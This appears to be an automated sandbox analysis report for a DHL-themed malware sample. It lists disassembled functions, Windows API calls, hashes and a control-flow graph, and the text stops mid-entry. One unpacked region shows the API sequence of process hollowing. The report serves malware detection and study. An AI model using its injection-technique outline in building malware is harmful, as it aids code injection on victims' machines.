                                                                                      control_flow_graph 792 1179be0-1179c80 call 117c070 * 3 799 1179c97 792->799 800 1179c82-1179c8c 792->800 801 1179c9e-1179ca7 799->801 800->799 802 1179c8e-1179c95 800->802 803 1179cae-117a360 801->803 802->801 804 117a373-117a3a0 CreateProcessW 803->804 805 117a362-117a366 803->805 811 117a3a2-117a3a5 804->811 812 117a3aa 804->812 806 117a3ac-117a3d9 805->806 807 117a368-117a36c 805->807 828 117a3e3 806->828 829 117a3db-117a3de 806->829 809 117a3e5-117a412 807->809 810 117a36e 807->810 813 117a41c-117a436 Wow64GetThreadContext 809->813 831 117a414-117a417 809->831 810->813 816 117a7a1-117a7a3 811->816 812->813 817 117a43d-117a458 ReadProcessMemory 813->817 818 117a438 813->818 819 117a45f-117a468 817->819 820 117a45a 817->820 821 117a74a-117a74e 818->821 824 117a491-117a4b0 call 117b6f0 819->824 825 117a46a-117a479 819->825 820->821 826 117a750-117a754 821->826 827 117a79f 821->827 839 117a4b7-117a4da call 117b830 824->839 840 117a4b2 824->840 825->824 832 117a47b-117a48a call 117b640 825->832 833 117a756-117a762 826->833 834 117a769-117a76d 826->834 827->816 828->813 829->816 831->813 831->816 832->824 848 117a48c 832->848 833->834 835 117a76f-117a772 834->835 836 117a779-117a77d 834->836 835->836 841 117a77f-117a782 836->841 842 117a789-117a78d 836->842 851 117a524-117a545 call 117b830 839->851 852 117a4dc-117a4e3 839->852 840->821 841->842 846 117a78f-117a795 call 117b640 842->846 847 117a79a-117a79d 842->847 846->847 847->816 848->821 858 117a547 851->858 859 117a54c-117a56a call 117c090 851->859 853 117a4e5-117a516 call 117b830 852->853 854 117a51f 852->854 862 117a51d 853->862 863 117a518 853->863 854->821 858->821 865 117a575-117a57f 859->865 862->851 863->821 866 117a5b5-117a5b9 865->866 867 117a581-117a5b3 call 117c090 865->867 869 117a6a4-117a6c1 call 117b240 866->869 870 117a5bf-117a5cf 866->870 867->865 877 117a6c3 869->877 878 117a6c8-117a6e7 Wow64SetThreadContext 869->878 870->869 873 117a5d5-117a5e5 870->873 873->869 876 117a5eb-117a60f 873->876 879 117a612-117a616 876->879 877->821 880 117a6eb-117a6f6 call 117b570 878->880 881 117a6e9 878->881 879->869 882 117a61c-117a631 879->882 890 117a6fa-117a6fe 880->890 891 117a6f8 880->891 881->821 883 117a645-117a649 882->883 885 117a687-117a69f 883->885 886 117a64b-117a657 883->886 885->879 888 117a685 886->888 889 117a659-117a683 886->889 888->883 889->888 892 117a700-117a703 890->892 893 117a70a-117a70e 890->893 891->821 892->893 895 117a710-117a713 893->895 896 117a71a-117a71e 893->896 895->896 897 117a720-117a723 896->897 898 117a72a-117a72e 896->898 897->898 899 117a730-117a736 call 117b640 898->899 900 117a73b-117a744 898->900 899->900 900->803 900->821
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0117A39B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0117A431
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0117A453
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                      • Instruction ID: ba81e7b3ae91f1cdb9708352fd172733ac9f06a1a7a74fda1b4de4fddc0c6674
                                                                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                      • Instruction Fuzzy Hash: 29621E30A14658DBEB28CFA4D850BDEB772EF58300F1491A9D10DEB390E7769E81CB59
                                                                                      Function 00033923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000733A2
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                      • String ID: Line:
                                                                                      • API String ID: 2289894680-1585850449
                                                                                      • Opcode ID: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                      • Instruction ID: 9ef8acbd347189736d6710782c6bfb898bf6c7fb6d57c21a4cd4c96068b0faf3
                                                                                      • Opcode Fuzzy Hash: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                      • Instruction Fuzzy Hash: 0531C271408304AAD326EB20DC85BEFB7DCAB45720F00892EF5D996092DBB49788C7D2
                                                                                      Function 0004FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                        • Part of subcall function 000532A4: RaiseException.KERNEL32(?,?,?,0005068A,?,00101444,?,?,?,?,?,?,0005068A,00031129,000F8738,00031129), ref: 00053304
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                      • Instruction ID: 490397f070c6710fc93f0b5b62357c669dbb14332d447795f247fca2d340b7df
                                                                                      • Opcode Fuzzy Hash: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                      • Instruction Fuzzy Hash: A9F0C23490070EB7CB00BAA4D84ADEF77AD5F00351B604531BD14DA992EF71EA6DC695
                                                                                      Function 000B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000B82F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 000B82FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 000B84DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: b0595f09b93040b80c5313767ccba0427409f5c37c982e43da4a3971517e815a
                                                                                      • Instruction ID: 7251716b715d9ac36e0e1feaee466f7da4e5e2c1d3c22304b37f8680f36e3c59
                                                                                      • Opcode Fuzzy Hash: b0595f09b93040b80c5313767ccba0427409f5c37c982e43da4a3971517e815a
                                                                                      • Instruction Fuzzy Hash: A5127B719083019FD764DF28C484BAABBE9FF85314F04895DE8899B262DB31ED45CF92
                                                                                      Function 000686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,000685CC,?,000F8CC8,0000000C), ref: 00068704
                                                                                      • GetLastError.KERNEL32(?,000685CC,?,000F8CC8,0000000C), ref: 0006870E
                                                                                      • __dosmaperr.LIBCMT ref: 00068739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2583163307-0
                                                                                      • Opcode ID: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                      • Instruction ID: e77c40e0a1a19a6aa65ad04b2b4db1b3f317515e4f1d2a3038c1e7443bb53d85
                                                                                      • Opcode Fuzzy Hash: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                      • Instruction Fuzzy Hash: 23016B3260427026D2B06334EC45BBE27CB4B81B75F384319F9489B1D3DEA0CD818350
                                                                                      Function 00041310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 000417F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: CALL
                                                                                      • API String ID: 1385522511-4196123274
                                                                                      • Opcode ID: a17cecad58c4e25db899f7d786d9f6bb710a66cd6bdaa44a6e1dfe7615ea8127
                                                                                      • Instruction ID: 131d13fdc4c87afe9fefdfac8545a3c5f6b897048f6797496ca4810a25eefa46
                                                                                      • Opcode Fuzzy Hash: a17cecad58c4e25db899f7d786d9f6bb710a66cd6bdaa44a6e1dfe7615ea8127
                                                                                      • Instruction Fuzzy Hash: D7228CB0608201DFC764DF14C484BAABBF1BF85314F15892DF4968B3A2D772E985CB46
                                                                                      Function 00032DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00072C8C
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 00032DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                      • Instruction ID: 05ab4bbd3d5b030ec6946f69fa90b3635db417b9cf5f481a41f8a97cc44a9713
                                                                                      • Opcode Fuzzy Hash: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                      • Instruction Fuzzy Hash: 3521A871E0025C9FDB42EF94C845BEE7BFCAF49714F008059E505B7241DBB85A898FA1
                                                                                      Function 00033837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                                                                      • Instruction ID: b07283d3c423edfc6c6257780c463192faa4991bb9b3b0b77939080407e8d0fc
                                                                                      • Opcode Fuzzy Hash: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                                                                      • Instruction Fuzzy Hash: 3B319370904301DFE761DF24D884B9BBBE8FB49719F00092EF5DA87641E7B5AA44CB52
                                                                                      Function 00035745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00074052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                      • Instruction ID: fff1b8bd7e689d600b43b52fbe58a9c6756cfe4e3882ba507494bea2bcaff2a9
                                                                                      • Opcode Fuzzy Hash: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                      • Instruction Fuzzy Hash: 07018030145225B6E3720A2ADC0EF977F98EF067B1F148200BA9D5A1E0C7B45854CBD0
                                                                                      Function 0003B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 0003BB4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID:
                                                                                      • API String ID: 1385522511-0
                                                                                      • Opcode ID: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                      • Instruction ID: 1ab05e007a4908f63834a4ab4a4743e44b945f5a79467c853724db3472ae997d
                                                                                      • Opcode Fuzzy Hash: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                      • Instruction Fuzzy Hash: 1932DF30A00209DFDB61DF54C898BBEB7F9FF44318F14805AEA85AB251C7B4AE45CB51
                                                                                      Function 01179BDD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0117A39B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0117A431
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0117A453
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                      • Instruction ID: 8394ba27b47429974e3fbe63deaa4c8bb6c8fc286e22e552745a3b7f7daa9a3e
                                                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                      • Instruction Fuzzy Hash: 1F12CF24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                      Function 000B709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: d2e6811e83956edacd61dc5d3bb8b2d44476a7ab4be1445e13642a4b0b14e8d7
                                                                                      • Instruction ID: f99d33a2a24f94c6927cf022aad34b5de8c7429976452716bddbabb0f655dd37
                                                                                      • Opcode Fuzzy Hash: d2e6811e83956edacd61dc5d3bb8b2d44476a7ab4be1445e13642a4b0b14e8d7
                                                                                      • Instruction Fuzzy Hash: 53D15C75A04209EFCB15DF98C8819EDBBB5FF88314F144059E919AB392DB30AE81CF91
                                                                                      Function 0004FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction ID: 65f49407338b2ccd74a4537c5ee3235da69a5044377b6247d62ddcf88a698c8f
                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction Fuzzy Hash: B731D2B5A0010ADBC768CF59D5C0A69FBA6FF49300B2486B5E80ACB656D731EDC1CBD4
                                                                                      Function 00034ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00034E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                        • Part of subcall function 00034E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                        • Part of subcall function 00034E90: FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                                                                        • Part of subcall function 00034E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                        • Part of subcall function 00034E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                        • Part of subcall function 00034E59: FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 2632591731-0
                                                                                      • Opcode ID: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                      • Instruction ID: 72bef9c433e68c672bc3e7a81239151b9055e0a5b278dc4dcac86c9fe5f09503
                                                                                      • Opcode Fuzzy Hash: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                      • Instruction Fuzzy Hash: 6211E336600205AEDB26AFA4DC02FED77A9AF40711F14842DF546AA1D2EE74AA059B50
                                                                                      Function 00068402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __wsopen_s
                                                                                      • String ID:
                                                                                      • API String ID: 3347428461-0
                                                                                      • Opcode ID: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                      • Instruction ID: 0820ce8073b5f2ab3fd73f04513afe748f3e9fa2b1c0ae3a04001677ec502251
